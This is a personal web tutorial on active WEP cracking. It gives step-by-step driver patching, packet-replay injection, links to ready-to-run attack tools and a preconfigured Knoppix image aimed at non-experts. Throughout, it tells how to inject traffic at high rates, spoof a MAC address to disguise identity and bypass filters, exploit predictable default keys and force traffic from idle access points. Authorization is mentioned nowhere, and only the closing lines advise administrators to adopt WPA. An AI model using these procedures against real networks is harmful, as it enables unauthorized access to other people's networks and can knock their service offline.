Active WEP cracking

by

L. Padilla

Foreword

I always liked wireless communications. First it was analog voice radio, then I became interested in digital radio long before 802.11 was developed. Nowadays wireless 802.11 (wifi) equipment has become very cheap and areas of coverage can be found everywhere, so I inevitably felt in love with it. Since I'm very interested in security and cryptography my attention was captured when I first heard about WEP weakness.

WEP weakness was caused by a misuse of the RC4 stream cipher algorithm in the 802.11 standard, and soon tools appeared to demonstrate the weakness in practice. I know of the following tools:

These tools are based on sniffing the normal WEP wireless network traffic to collect enough WEP packets, so that they can take advantage of the WEP weakness to recover the WEP key. This approach has the advantage of being passive and therefore undetectable. The disadvantage is that it may require a lot of time (weeks, months, ...) to collect enough packets, specially in case of low traffic or poor signal quality.

I read for the first time in the documentation of Aircrack about the possibility of speeding up the process by resending special packets to the air, they even included a tool and instructions on how to do it. I decided to study in more detail this interesting possibility. The first problem I met was that the method required two non-USB wireless cards with the Prism2 chipset. Hell! I even hadn't just one! Later the method was refined so you can use just one card, but I still hadn't any. Additionally the method was rather complicated, you have to use HostAP software to turn your PC into an access point and then use the send & capture tools. Lately the process seems to have been simplified and support for more chipsets has been added.

As long as I have different wireless cards, I tried to reproduce this method (as simply as possible) with them before thinking about buying a Prism2 card (or two). I had success and here I describe the technique and the steps required, and provide the software needed. With this kind of attack you can obtain a WEP key in a time which varies from minutes to hours depending on the key itself, the key length and the use or filter of weak IVs by the access point.

Requirements

First of all you need a wireless card with the same chipset as one of mines. I'm sorry about that, but I don't have access to all kind of hardware to test it. Unfortunately wireless hardware and drivers are still not mature enough so that any software will work with any card, specially when you are interested in low level features. Nevertheless I might append new hardware support depending on its (and my) availability. If you dare you can try to repeat the same steps with a different chipset to see if it works too, but surely you will have, at least, to modify the driver in the best case.

My first wireless adapter was a D-Link DWL-G650+ CardBus card, so by now you can use a card with the Texas Instruments (TI) ACX111 chipset. I have not tested the ACX100 chipset or USB devices, but they might work as well. See the following links to check if your card has a TI ACX111 chipset:

My second wireless adapter is a Cnet CWP-854 PCI card, so by now you can also use a card with the Ralink RT2560 chipset. Later I have used other adapters using the RT2570 and the RT73 chipsets (both USB), so you can use both them as well. I have not tested the RT2400 chipset, but it might also work. See the following links to check if your card has a RT2560, RT2570 or RT73 chipset:

The second thing you will need is a PC with a relatively recent linux distribution (Suse 9.2, Fedora 2, Knoppix 3.7 or newer releases are OK, I haven't tested older or other distributions). Your linux should have network support and certain software: wireless tools, csh or tcsh, tcpdump, libpcap, patch and gcc. Other features and software are needed but they are always present in any recent (and decent) distribution, at least with the profile described above. Usually all required software is installed by default, if not just install the corresponding packages. If you don't have linux and can't install it, you can run it live on CD, that is the case of Knoppix and other distributions. I provide below precompiled software and special instructions to use with Knoppix, so you won't even need to install linux, although it will be a pity ;-).

Finally you will need coverage of a WEP enabled wireless network. Be aware that, by default, the attack is very aggressive, it might collapse the access point, so be very careful when choosing the network to test.

First steps

If you want to do passive WEP cracking your card must have support for monitor mode. In this mode all packets passing by in the same channel are captured, no matter what client or access point they belong to or whether they are data or 802.11 management packets. In addition packets are captured unmodified, with their 802.11 header, etc. Not all cards support the monitor mode, mainly because of a driver limitation. Chipsets ACX111, RT2560, RT2570 and RT73 and their open source linux drivers support it, but by the time of this writing both drivers require a patch (see below). If you have another chipset your first step has to be to check for the monitor mode, usually it is documented in the driver. If it is not supported you'll have to get another card or wait until the driver supports it, or if you are impatient and skilled, implement it yourself helping the open source driver development team.

If you want to carry on active WEP cracking with just one wireless card you have to send and receive packets at the same time while in monitor mode. It seems not all cards are able to do this. I don't know why because in normal operation the card does it, you constantly send and receive packets when using the network. It should make no difference whether you are in monitor mode because, in principle, the only difference with the normal mode is that certain packets which the chipset discards or keeps to itself, are now passed to the driver. At first I thought no card had that feature, but to my surprise I realized that chipset ACX111 was capable of that, later I checked that the RT2560, RT2570 and RT73 chipsets have the feature as well. So if you have a different chipset you should find about the status of this question. Sometimes it is documented in the driver, if it is not the case do a simple experiment: join to a network (it does not matter whether it is WEP enabled or not, or whether you have the WEP key), assign any network address to the interface, start pinging any host, switch to monitor mode, start a network analysis tool like tcpdump (run "tcpdump -i wlan0 -nl" as root, mind the interface name) and observe. If tcpdump shows that after every ping going out there is an ACK 802.11 management packet coming in, then you are lucky. You might even see echo replies arriving if your network is set up right, but don't expect that the ping command will show the echo replies because the ethernet driver can't understand packets with the 802.11 header not removed. There are several reasons why the experiment may fail even if the card is capable of sending packets while in monitor mode. One might be that the driver disables transmission in that mode just for safety reasons, then you can only see the source code (or ask developers) to check if this is the case, and if so disable that limitation. Note that packet observation might be difficult to carry on in a highly used network, in that case using a tcpdump packet filter might help.

If no matter what you do you still can't make your card emit packets while in monitor mode, there might still be a chance to perform an active WEP cracking attack using a single card of that type. The method consists in sending packets in normal mode, switch to monitor mode and listen for the answers, then switch again to normal mode to send more packets and so forth. In theory this is always possible, but one has to check that the switch time from normal to monitor mode is smaller than the time needed for the answer of the access point (or other client) to reach you, which seems to be typically in the order of a few milliseconds. This is a long time for a computer device, so in principle this system should work with any card. That was my first idea for an active attack until I discovered the excellent ACX111 feature (and later the same for RT2560, RT2570 and RT73). The method should be fine tuned to achieve optimum performance. This will be when the card sends packets until the first packet answer arrives, and then listens for the same time to collect all answers. So optimum performance will be achieved when the card spends 50% of the time sending packets and the other 50% receiving their answers, and each interval has the duration of the transit time of one packet to go and get back (as an answer). Therefore this method would never obtain an efficiency of more than 50% (actually in practice it will be always lower because you have to account for the switching time between modes of operation), while for an ACX111, RT2560, RT2570 or RT73 (or another chipset with the desired powerful feature) you'll get 100%. Of course you always can use two or more cards to reach and even overcome the 100% efficiency.

Active WEP cracking will also require the ability to send raw packets in the wireless driver. As far as I know this feature is not present in any driver, so surely you will have to patch it as I did for the ACX111 and for the RT2560.

The theory

The basic principle of an active attack consists in sending packets to the WEP network to increase the traffic and so to speed up the WEP key cracking. The problem is that packets that are not WEP encrypted with the right key are ignored by the access point and the clients. To overcome this problem one can take advantage of one of the numerous WEP weaknesses, packet replaying. WEP does not add any timestamp, MAC (Message Authentication Code) or whatever to recognise a replayed packet. The same ethernet packet is converted always into the same WEP packet (if the same IV is used, but this one is not part of the ethernet data), so you can inject a previously seen packet and no one will notice it.

If you inject a randomly chosen packet among the ones captured flying around, you would normally not get any client answer. This is because TCP or UDP protocol (most abundant network traffic) have protection against replayed (or out of time) packets. So even though WEP allows replaying, TCP and UDP do not. However if you replay a broadcast packet, which obviously does not belong to any TCP or UDP session, you will receive the answers, if any. You might not receive any answer simply because there's no client willing to do so, it might even happen that the original packet had no answer as well. Therefore you should try to choose a packet which does receive at least one answer. Usually ARP packets are answered, provided that the host whose ethernet address you are asking for is still alive (the access point gateway is always alive). The problem is how to recognise ARP packets. There are several techniques, one is based on the packet size, another is to listen for the very first broadcast packets after one host joins to the network, which should be ARPs. You can simply capture all broadcast packets for a time, then replay them and observe which of them get answers.

Actually things are simpler than this. You don't need any client answer. When you send a WEP packet it is first received by the access point, it decrypts it and if it is valid (right encryption), it reencrypts it with another IV and resends it for the other clients. Depending on the destination address the access point might not send the packet through wireless but forward it to network cable instead. However a broadcast packet will always be sent to the air. Broadcast packets have another advantage, they are send at low speed rate (usually no more than 11 Mbps), this enhances the probability that the access point will receive your packets and that you will receive its answers. Of course you will send and receive less packets per second than if you were using a higher transmission rate (i.e. 54 Mbps), but it is worth, specially in cases of poor signal quality.

Summarizing, your best choice is to get the smallest (to take less time to send and receive it) broadcast packet which receives the most answers (it will get at least the access point answer, but if it gets one or more client answers it will be an extra benefit, the number of packets will be multiplied). Actually you don't even need to capture a broadcast packet, because the 802.11 header can be forged, so any packet can be turned into a broadcast packet, but of course that packet will not receive any client answer, however you will receive the access point resent packet. More on packet forgery later.

Preparing the attack

The first thing you need to perform the attack is to have a proper linux driver for your wireless adapter ready to work. Note that it may require modification and recompilation to add the needed support if it is not included within the standard driver. This is the case of the ACX111 and RT2560 chipsets. Separate instructions are given below for each driver.

ACX111 driver procedure

By the time I started this project the driver lacked several key features: WEP support, WEP sniffing and capability to send raw packets. With the help of the open source driver developers I managed to add the required features. All the work was done with version acx100-0.2.0pre8_plus_fixes_43 to which you have to apply my ACX111 patch for the required features. Just download both files, go to that directory and follow these instructions:

Linux prompt>tar -xjf acx100-0.2.0pre8_plus_fixes_43.tar.bz2

Linux prompt>patch -p0 < wepacx111_and_others.patch

Linux prompt>cd acx100-0.2.0pre8_plus_fixes_43

Linux prompt>make config.mk

See if is there any warning about something you lack, if so fix it and then:

Linux prompt>make

The process might end with errors at the USB module compilation stage, if so don't care, ignore the error but check that the PCI module was created as src/acx_pci.ko or src/acx_pci.o.

If you want to install this driver as the default ACX driver then (as root):

Linux prompt>make install

In case of compilation errors in the USB module you will have to do a manual installation simply by doing something like (as root):

cp src/acx_pci.ko /lib/modules/`uname -r`/kernel/drivers/net/wireless/
depmod -a

You may prefer not to install this driver as default because it is not the latest one. Actually the required features may have already been implemented in the latest driver release, but I have not tested it. So you may try to download the latest distribution, do not patch it, compile and install it. Then test the active WEP crack as explained below to see if it works. If not then download the release linked above, patch it, compile but do not install it. Instead copy the module acx_pci.ko or acx_pci.o (depending on your kernel version) from acx100-0.2.0pre8_plus_fixes_43/src into the working directory where you will run the tools given below. This way active WEP cracking will use the old patched but successfully tested driver, while normal linux operation will use the brand new driver you installed.

(Update: Latest legacy driver I tested, version 20060521, for ACX111 does implement all the required features, but it fails when trying to change the MAC of the adapter. This is not a strictly needed feature, but sometimes it is convenient, so here it is a patch to fix the MAC change problem for that version.)

RT2500 driver procedure

By the time I started working with this chipset the driver lacked several required features: sniffing of all packets in monitor mode (certain types were missed) and capability to send raw packets. Thanks to an open source and well documented driver I managed to add the required features. All the work was done with version rt2500-1.1.0-b3 to which you have to apply my RT2500 patch for the required features. Just download both files, go to that directory and follow these instructions:

Linux prompt>tar -xzf rt2500-1.1.0-b3.tar.gz

Linux prompt>patch -cp0 < rawrt2500_and_others.patch

Linux prompt>cd rt2500-1.1.0-b3/Module

Linux prompt>make

If you want to install this driver as the default RT2500 driver then (as root):

Linux prompt>make install

You might prefer not to install this driver as default if it is not the latest one. Actually the required features might have already been implemented in a later driver release. So you may try to download the latest distribution, do not patch it, compile and install it. Then test the active WEP crack as explained below to see if it works. If not then download the release linked above, patch it, compile but do not install it. Instead copy the module rt2500.ko or rt2500.o (depending on your kernel version) from rt2500-1.1.0-b3/Module into the working directory where you will run the tools given below. This way active WEP cracking will use the old patched but successfully tested driver, while normal linux operation will use the brand new driver you installed.

(Update: Latest legacy drivers for RT2500, RT2570 and RT73 (and possibly for the other Ralink chipsets) do implement all the required features.)

Common procedure

Your next step is to install Aircrack ( => Aircrack-ng, but its command line options may not be backwards compatible, so you may need to change some things in the script) in the execution path if you want AirMonitor to automatically find the WEP key. Finally you just have to start the attack. Simply download the following tools:

(Update: In order to speed up the attack in certain cases, you will also need these files: WLAN Brute Active, WLAN Brute Passive, airmon script, set execution bit after download for the three scripts, brute force packet, and patch for last available version of Aircrack, 2.41.)

Compile the two C files (see source for instructions) and edit the csh script to configure it with your particular data (see source for instructions). (Update: Configuration of the script is now also possible through command line arguments, execute with '-h' to see options). Basically you have to configure the ESSID, MAC and channel of the access point you want to crack. If you run AirMonitor without configuring the ESSID it will show the list of visible access points. Optionally you can configure the output data path (if not enough free disk space in the current directory), the MAC you want to set to your interface (this allows disguising your identity and bypass any MAC filter in the access point) and the capture mode (weak or full). The first mode will capture only weak IV packets, it is recommended if you are short of disk space, but will not work with modern access points which skip weak IVs (or most of them). In that case you will have to configure the full mode (you'll need several hundreds megabytes of free disk space). Finally you can configure some technical data if auto detection does not work, like the module name (acx, acx_pci, rt2500, rt2570 or rt73), the wireless interface name and the firmware directory in case of an ACX111 chipset.

(Update: Now there are two new options to speed up the attack. One is to enable a specific attack for routers with ESSID of the form WLAN_XX, where XX is a two digit hexadecimal number. Those routers usually have a predictable default WEP key which can be decrypted with just one data packet captured. This option is enabled by default and if the chosen ESSID is not of that type then the option is automatically disabled. If the AP under attack is of that type but it does not use the default predictable key, then the option is automatically disabled and the attack continues like for any other kind of router. The second new option is provided to attack an AP without traffic. As far as I know this is the only tool that is able to do that. This attack consists in sending special packets to try to force the AP to answer with a valid WEP data packet, that once it is captured it will allow to carry on the normal attack. It only works with adapters with Ralink chipsets. Depending on the kind of router of the AP, the attack may succeed within a few seconds, or can take hours or days, or may not work at all. In any case you won't loose anything trying because as soon as there is normal traffic in the network the attack would continue as usual. However this option is disabled by default because it is very aggressive, nevertheless note that when a packet is captured and the active attack begins, it would get aggressive anyway, that is what "active WEP cracking" is about :-)

AirSend is the program responsible for the active part of the attack, it replays packets from the pcap file you give it as a parameter. There can be more than one packet in the file. You can control how many times the file is replayed (with the -c option, 0 means replay forever) and at what speed (with the -d option, which sets the number of microseconds to wait between consecutive packets, a negative value means as fast as it can; note that values below the millisecond are not useful because the kernel will schedule away the process and will not resume it until typically several milliseconds later, due to it is not a real time application). Some other options are provided to forge the 802.11 header (FC, A1, A2 and A3 fields) and so, for example, any packet can be replayed as broadcast going from a client to the access point even if it actually was a unicast packet going from the access point to a client; WEP payload would be perfectly valid, though.

WeakCap is provided in case you are short of disk (it was my case), so total disk space required for a successful WEP crack is only a few megabytes. However it will take more time to collect enough packets to find the WEP key. Note that it is not useful if the access point skips weak IVs, something common in newer hardware.

AirMonitor will take care of initializing and configuring the wireless adapter, bringing all pieces together to perform the active attack, and most important, it will monitor the free disk space and that the card is operating well. It happens from time to time that my ACX111 card stops collecting packets when performing the attack, I don't know if it is a problem of the driver, the adapter, other element or simply the attack is too heavy. It is fixed by reloading the driver, so the script checks for this condition and if found, reinitializes the card to keep carrying the attack on. AirMonitor will also start Aircrack when there is enough data collected and will restart it each time a substantial amount of new data is captured. When the key is found it is displayed on screen (and saved in a file) and the attack is stopped.

The attack

When you have everything set up the attack is simply started by executing the script AirMonitor as root. It will take care of running the rest of programs required. In the output directory will appear a temporal pcap file which stores captured packets. Each time the card hangs, the content of this file is appended to another pcap file named as the ESSID of the access point under attack.

The attack is performed at the highest speed to collect as much packets as possible. Therefore the access point and even clients may experience a deadly slow down of performance, so it is advisable to run the attack when no one is using the network, at least interactively. I've reached speeds of more that one thousand packets per second, but poor wireless coverage will proportionally decrease that speed; a good antenna, specially if it is very directional, may enhance the rate a lot.

AirMonitor will run until the WEP key is found by the automatically launched Aircrack process. Operating at a speed of 1000 packets/s you can collect 3.6 million packets per hour, so the WEP key can be found in less than 5 minutes of attack (actual time depends on the packet rate, the key itself, the key length and statistical fluctuations). This is true if the access point does use weak IVs, if not it may take a few hours of continuous attack (though it can be split along different periods) to gather enough packets so that Aircrack can find the WEP key.

AirMonitor can be interrupted at any time using ctrl-c, but it may leave some running processes and temporary files. The best moment to stop it is when it is waiting to associate with the AP (the output on screen announces this condition and informs about being the best moment to interrupt the script). However when you restart AirMonitor everything is set up properly and no data is lost. So the best trick to stop AirMonitor at the desired time is to hit ctrl-c, restart it and interrupt it again when it is waiting for association. This way all files are closed properly and no processes are left running, except Aircrack, you have to stop it manually, otherwise it will run until the key is found or it fails to find it.

Active WEP cracking for dummies

If you say "fine, but I do not dare installing linux and doing everything else", this section is for you. Here are instructions and precompiled binaries so you don't need nearly any linux knowledge. First download the Knoppix 3.9 CD image (better look for your nearest mirror) and burn it on a 80 min CD, then download this package and unpack it in a floppy diskette, USB memory or directory of a hard disk partition. Use a text editor to configure the variables at the beginning of the file airmonitor.csh as explained above, or use command line arguments. If you are using an ACX111 card don't forget that the firmware file has to be accessible to Knoppix. If you did not install the card driver in the windows partition then copy it to the working directory. Firmware file can be found in the manufacturer driver media or, if you installed the driver in your windows partition, usually in c:/windows/system32/drivers and is commonly named TIACX111.BIN, FwRad*.bin or FW*.bin (see section "Firmware for ACX111 cards" of the ACX driver documentation for more details). You can download it also here, but rename it to TIACX111.BIN.

Now place the Knoppix CD into the CD reader and boot the computer from it, in case of a problem see the Knoppix help to fix it. Once linux is booted press Ctrl-Alt-F1 to get a root shell and mount the media where you placed the tools. This is achieved with a command like "mount /mnt/fd0", "mount /mnt/sda", or "mount /mnt/hda1" for a floppy, USB memory or hard disk partition respectively. The actual device may depend on your particular setup, execute "ls /mnt" to see the list of devices accessible by Knoppix. Then go to the directory with a command like "cd /mnt/fd0", "cd /mnt/sda", "cd /mnt/hda1" or similar depending on your configuration. Finally type "./airmonitor.csh" to start the attack and collect packets, be sure to have enough free space in the data directory. And that's all, AirMonitor will tell you when the WEP key is cracked by Aircrack.

Active WEP cracking for extreme dummies (or for lazybones ;-)

(Recommended choice for non linux experts!)

Ok, I actually did all the work for you, so simply download my prepared 700 MB Knoppix CD image, which includes everything that is required and all ready to run. Then you just have to boot from this CD (pay attention to select the proper keyboard layout at boot, it defaults to Spanish layout). This image boots into text mode by default, but you can boot into graphics mode if you like (it takes more time to boot and uses more resources). Once you have a root shell prompt type the command ". /cdrom/CheapHighTech/bin/setup". Then execute "airmonitor.csh" without parameters to see whether your wifi card is detected and to show APs around. Note the required parameters of the AP you want to attack (ESSID, MAC and channel) and execute the script with those parameters, like this: "airmonitor.csh <ESSID> <MAC> <channel>", this is usually enough. There are other command line arguments available, run "airmonitor.csh -h" to see them all. Look inside the script for a short explanation of each parameter. Note that in this mode all data is written into memory, this is usually ok for recent systems, but old systems may run out of memory. If the computer hangs or resets then all data recorded are lost. You can overcome these caveats by using a hard disk, USB pen drive, etc. and select it with the corresponding command line argument.

Summary

Here are the steps for a quick start if you have a USB, PCI or CardBus wireless adapter based on the ACX111, RT2560, RT2570 or RT73 chipsets and a standard linux distribution, details can be found in the text above:

Simplified variant using Knoppix:

Even more simplified variant using my prepared Knoppix: (Recommended choice for non linux experts!)

Another approach

Just for completeness it is interesting to mention another way of cracking a WEP network. It is based on a brute force attack to try to find the right key simply by checking many combinations. The best way to accomplish that is by capturing a couple of WEP packets (really only two packets are needed, the smaller size, the better; you can use the same method as described above for capturing a broadcast packet) and launch an offline key trying process.

A brute force search method would, in principle, try all possible key combinations to find the right WEP key. However doing it so is not very practical because it may take too much time. For the weakest WEP key (40 bits) it would take several months in a fast PC (can be faster using several computers in parallel) but for a stronger key (104 bits and above) there is not enough computing power in the world to have a likely chance to find the key in a reasonable time.

A very quick approach, only practical for 40 bit WEP keys, is to restrict the search to keys composed only of 7 bit ASCII printable characters (in case the key was set in ASCII mode by the network administrator) or decimal digits (in case the administrator set manually the key in hexadecimal mode). Both are common cases in poorly configured networks regarding security. Restricting the key search in that way, a modern PC can try all combinations in less than 24 hours for each of both cases. I wrote a couple of very simple programs to try this attack using the decrypt tool included in the AirSnort package. To try them simply download FindWEPkey HEX and ASCII versions, configure the system function call accordingly to your case and compile (see source for details). You would need the AirSnort tool decrypt compiled and installed in your execution PATH.

In case of stronger WEP keys (104 bit and above) or WPA algorithm the only viable method is the dictionary attack, in which a list of words, numbers and combinations of them is used sequentially to see if any match is produced with a poorly chosen passphrase or key. See Aircrack ( =>Aircrack-ng), coWPAtty and WPA Cracker (dead link).

Conclusions

As we have seen, it is very easy and quick to break into a WEP protected network, no matter how long is the WEP key, how low is the network traffic or whether weak IVs are not used. So administrators willing to protect their networks should move to a stronger algorithm like WPA, but always taking care of choosing robust passphrases.


E-mail: padilla at domain "gae ucm es" (my PGP/GPG public key)
First version: 8-Apr-2005, last update: 7-Dec-2009
This link: http://www.gae.ucm.es/~padilla/extrawork/activewepcrack.html
Color line
Back Go to the parent page: Cheap Hi-Tech.